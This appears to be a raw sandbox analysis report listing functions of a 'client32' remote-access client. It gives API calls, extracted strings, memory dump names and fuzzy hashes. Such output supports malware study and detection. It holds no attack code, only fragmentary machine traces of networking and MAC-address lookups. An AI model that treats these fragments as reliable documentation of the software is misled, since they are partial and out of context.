LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
GetSystemMetrics.USER32(00000032), ref: 110271EE
GetSystemMetrics.USER32(00000031), ref: 110271F3
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
LoadIconA.USER32(11000000,00000491), ref: 1102721B
GetSystemMetrics.USER32(00000032), ref: 1102722A
GetSystemMetrics.USER32(00000031), ref: 1102722F
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240

Strings

product, xrefs: 11027168
_License, xrefs: 1102716D
PCIRES, xrefs: 110271BB
AdminUserAcknowledge, xrefs: 1102729B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$PCIRES$_License$product
API String ID: 1946015-1270847556
Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2

Function 68C69E20 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 68C77BE0: _memset.LIBCMT ref: 68C77BFF
Part of subcall function 68C77BE0: _strncpy.LIBCMT ref: 68C77C0B

__wcstoui64.LIBCMT ref: 68C69EF8

Strings

RESULT, xrefs: 68C69EA1
strlen(p) == 12, xrefs: 68C69F58
Gateway rejected client connection because licence was exceeded., xrefs: 68C69F9D
MAC, xrefs: 68C69F24
PROTOCOL_VER, xrefs: 68C69F07
SERVER_VERSION, xrefs: 68C69E60
MAXPACKET, xrefs: 68C69E81
Gateway rejected client connection because security check failed., xrefs: 68C69FA4
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C69F53
CMPI, xrefs: 68C69EE1
FAILED_REASON, xrefs: 68C69EC1
1.0, xrefs: 68C69E27, 68C69E37

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __wcstoui64_memset_strncpy
String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
API String ID: 2670788892-1257448691
Opcode ID: ded9c758821b7005522a23fdf5994305575ae3a8d928dcce999cec8afa53775d
Instruction ID: c7150eff151fc60cd4a7041e2eae88488b011e7c3d43d0f7e38778cecb6be959
Opcode Fuzzy Hash: ded9c758821b7005522a23fdf5994305575ae3a8d928dcce999cec8afa53775d
Instruction Fuzzy Hash: 21418DB9D4420A6BEB108B74AC85B7F35A89B0136DFC40035E815D7241FB66D696C7E3

Function 68C80970 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 68C809A6
GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 68C809C3
GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 68C809CD
GetProcAddress.KERNEL32(00000000,socket), ref: 68C809DB
GetProcAddress.KERNEL32(00000000,closesocket), ref: 68C809E9
GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 68C809F7
FreeLibrary.KERNEL32(00000000), ref: 68C80A6C

Strings

WSAIoctl, xrefs: 68C809EB
socket, xrefs: 68C809CF
closesocket, xrefs: 68C809DD
WSACleanup, xrefs: 68C809C5
ws2_32.dll, xrefs: 68C8098B
WSAStartup, xrefs: 68C809BD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
API String ID: 2449869053-2279908372
Opcode ID: d4371ec0eae05233d8acf1bdea469efd65fc8f774ef909e69a3218468a2642de
Instruction ID: 4970382bfd55c57240b8a61074ebbc3db62f09a5c586c0b46d7d2f2054595b17
Opcode Fuzzy Hash: d4371ec0eae05233d8acf1bdea469efd65fc8f774ef909e69a3218468a2642de
Instruction Fuzzy Hash: 1D318971B41218AFDB149F748C59FEE7B78EF86314F404195FA19A7280EA709D418F91

Function 68C66190 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 129COMMON

Download Yara Rule

APIs

Part of subcall function 68C77BE0: _memset.LIBCMT ref: 68C77BFF
Part of subcall function 68C77BE0: _strncpy.LIBCMT ref: 68C77C0B

__wcstoui64.LIBCMT ref: 68C6622B
EnterCriticalSection.KERNEL32(68CAB898,-000397EB,?,?,68C72C4D), ref: 68C662AF
_strncpy.LIBCMT ref: 68C662E5
_free.LIBCMT ref: 68C662FB
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,?,?,?,?,?,?,68C72C4D), ref: 68C6631D

Strings

RESULT, xrefs: 68C661E2
CLIENT_NAME, xrefs: 68C66200
PROTOCOL_VER, xrefs: 68C66254
SERVER_VERSION, xrefs: 68C66272
CONNECTION_ID, xrefs: 68C66215
FAILED_REASON, xrefs: 68C66236
1.0, xrefs: 68C661AA

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_strncpy$EnterLeave__wcstoui64_free_memset
String ID: 1.0$CLIENT_NAME$CONNECTION_ID$FAILED_REASON$PROTOCOL_VER$RESULT$SERVER_VERSION
API String ID: 2226502904-1282845728
Opcode ID: 0e0129140175e8be6206a68ba65e771fa4420ae0bf7512fd9d93df1269338112
Instruction ID: 0db481af26325b134b3be10cb49d4f69b0b9612a92b5a1010273f728c9746efe
Opcode Fuzzy Hash: 0e0129140175e8be6206a68ba65e771fa4420ae0bf7512fd9d93df1269338112
Instruction Fuzzy Hash: 2841D3B4D4060AAFDB209F64EC81D7E7B78EB40369F904136E916AB240F73586518BA2

Function 68C77E60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C77E8D
LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,00000000,00000000,00000010,?,?), ref: 68C77E9A
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68C77EB3
_malloc.LIBCMT ref: 68C77ED8
_memmove.LIBCMT ref: 68C77F20
_free.LIBCMT ref: 68C77F31
FreeLibrary.KERNEL32(00000000), ref: 68C77F3D
_memmove.LIBCMT ref: 68C77F5F

Strings

iphlpapi.dll, xrefs: 68C77E95
cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH, xrefs: 68C77E78
macaddr.cpp, xrefs: 68C77E73
GetAdaptersInfo, xrefs: 68C77EAD

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Library_memmove$AddressFreeLoadProc_free_malloc_memset
String ID: GetAdaptersInfo$cbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH$iphlpapi.dll$macaddr.cpp
API String ID: 3275914093-1155488092
Opcode ID: 2e5952f7e00aa75c6e12cdb74e3fd5fe9b12dc3ab7a1c6bf96fa072d61b559b4
Instruction ID: cb070a25b383d1b18c99bea47702513faec605275cbf4a6f089b223fefa4f3db
Opcode Fuzzy Hash: 2e5952f7e00aa75c6e12cdb74e3fd5fe9b12dc3ab7a1c6bf96fa072d61b559b4
Instruction Fuzzy Hash: B131B3B6E0021DABDB10DEB59D84DAF7778EB44358F804565F928E7240F730EE0597A0

Function 1100D220 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D291

Strings

NoCapClients, xrefs: 1100D263
BadParam, xrefs: 1100D271
DllInitFailed, xrefs: 1100D247
Unknown error %d, xrefs: 1100D287
CannotGetFunc, xrefs: 1100D24E
StillInstances, xrefs: 1100D27F
AlreadyStopped, xrefs: 1100D25C
CannotLoadDll, xrefs: 1100D240
AlreadyStarted, xrefs: 1100D255
RequiresVista, xrefs: 1100D239
Exception, xrefs: 1100D278, 1100D286
NotFound, xrefs: 1100D26A

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296

Function 1105B1B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 159windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A

CreateWindowExA.USER32(00000000,NSMCltReplayClass,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000), ref: 1105B226
IsWindowVisible.USER32(?), ref: 1105B298
UpdateWindow.USER32(00000000), ref: 1105B339
GetWindowRect.USER32(00000000,?), ref: 1105B2CD

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

UpdateWindow.USER32(00000000), ref: 1105B363

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 1105B390

Strings

m_hWnd, xrefs: 1105B2B5, 1105B328, 1105B352
NSMCltReplayClass, xrefs: 1105B220
CltReplay.cpp, xrefs: 1105B238
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1105B2B0, 1105B323, 1105B34D
m_hWnd || !"CltReplayClass Window failed to create", xrefs: 1105B23D

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ExitLibraryProcessUpdate$AddressCreateDefaultErrorFreeLangLastLoadMessageProcRectSystemVersionVisible_memset_strrchrwsprintf
String ID: CltReplay.cpp$NSMCltReplayClass$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_hWnd || !"CltReplayClass Window failed to create"
API String ID: 1774176861-1619494117
Opcode ID: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
Instruction ID: 79629effa54c5317598ac1fd62f88e21f554d2986a4eda5a7fee751a18d8bf94
Opcode Fuzzy Hash: 6bea5c09297829cbfb848c60cb5d7fef759d0651ead25e322a2e7de13e6ca9cc
Instruction Fuzzy Hash: D0518D74B00706ABD760DF64CC81FAAF3B9BF44708F108568EA56AB685DB30F944CB94

Function 68C801E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 68C7DBD0: _malloc.LIBCMT ref: 68C7DBE9
Part of subcall function 68C7DBD0: wsprintfA.USER32 ref: 68C7DC04
Part of subcall function 68C7DBD0: _memset.LIBCMT ref: 68C7DC27

std::exception::exception.LIBCMT ref: 68C8024A
__CxxThrowException@8.LIBCMT ref: 68C8025F
GetCurrentThreadId.KERNEL32 ref: 68C80276
InitializeCriticalSection.KERNEL32(-0000000E), ref: 68C80289
InitializeCriticalSection.KERNEL32(68CAD004), ref: 68C80298
EnterCriticalSection.KERNEL32(68CAD004), ref: 68C802AC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 68C802D2
LeaveCriticalSection.KERNEL32(68CAD004), ref: 68C8035F

Strings

Refcount.cpp, xrefs: 68C802E6
QueueThreadEvent, xrefs: 68C802EB
0/Mw, xrefs: 68C802D2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: 0/Mw$QueueThreadEvent$Refcount.cpp
API String ID: 1976012330-1315522609
Opcode ID: 611740140a023d7f4cb3f3a9a77d7855f67a9e9fdb3acfe29a86a27cf1305ca5
Instruction ID: 14b44df4371d265c8199e9f979cf5a6d9d858c869b4d049aa669c44aa729ad21
Opcode Fuzzy Hash: 611740140a023d7f4cb3f3a9a77d7855f67a9e9fdb3acfe29a86a27cf1305ca5
Instruction Fuzzy Hash: 5241E2B5980604EFDB21CF69DC85AAEBBF4FB45708F40412AEA19E7240F770D900CB51

Function 1105D190 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(111E9674), ref: 1105D1F2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
TranslateMessage.USER32(?), ref: 1105D2F6
DispatchMessageA.USER32(?), ref: 1105D2FC

Strings

NSMCobrProxy, xrefs: 1105D1E8, 1105D22C, 1105D2B7
CobrowseProxy::RunCobrowse, xrefs: 1105D1BA
m_hAppWin, xrefs: 1105D24A
_bOK, xrefs: 1105D209
CobrowseProxy.cpp, xrefs: 1105D204, 1105D245

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
Opcode Fuzzy Hash: 6615396438022e20a6e8c72f97bc0a79f3717cf56149bec578354cdf49c6fa9e
Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61

Function 68C8ABF1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 68C8AC70
__getptd.LIBCMT ref: 68C8AC82

Strings

MOC, xrefs: 68C8AC19
RCC, xrefs: 68C8AC24
csm, xrefs: 68C8ACEF
csm, xrefs: 68C8AC38

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __getptd
String ID: MOC$RCC$csm$csm
API String ID: 3384420010-1441736206
Opcode ID: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
Instruction ID: 90fc7028f35db50fe078b79f7ad63e0b323579b621a33e20c20d4757a9cfffeb
Opcode Fuzzy Hash: 2948d543296bb9c706df1e9ba1aa1137578febb3c3cc4c93cd90a746d2b5b3f7
Instruction Fuzzy Hash: F2318EB1580604CFCB108F69C484B697BB8BF8030EFD4886AD965E72D1F770E946CA93

Function 110290F0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?), ref: 1102910C

Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8

wsprintfA.USER32 ref: 11029157
MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
ExitProcess.KERNEL32 ref: 110291A9
_strrchr.LIBCMT ref: 110291E5
ExitProcess.KERNEL32 ref: 11029224

Strings

Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
Info. assert, restarting..., xrefs: 1102920D
Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
Client32, xrefs: 11029185
V12.10F4, xrefs: 11029143

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
